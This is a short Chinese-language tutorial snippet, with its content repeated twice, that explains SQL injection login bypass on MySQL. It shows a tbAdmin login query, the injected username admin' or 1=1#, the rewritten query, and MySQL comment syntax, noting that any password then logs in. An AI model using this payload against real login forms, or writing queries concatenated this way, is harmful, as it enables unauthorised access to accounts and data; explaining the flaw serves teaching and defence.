// 这里以MySQL为例子
select name,pass from tbAdmin where name='admin' and pass='123456'
输入:admin' or 1=1#
SQL变成下面这个样子:
select name,pass from tbAdmin where name='admin' or 1=1#' and pass='123456'
你会发现随便输入密码,都可以随便登陆了。。。
-----------------------------------------------------
select * from tbAdmin # 这是MySQL注释
select * from tbAdmin /* 这是MySQL注释 */
select name,pass from tbAdmin where name='admin' and pass='123456'
输入:admin' or 1=1#
SQL变成下面这个样子:
select name,pass from tbAdmin where name='admin' or 1=1#' and pass='123456'
你会发现随便输入密码,都可以随便登陆了。。。
-----------------------------------------------------
select * from tbAdmin # 这是MySQL注释
select * from tbAdmin /* 这是MySQL注释 */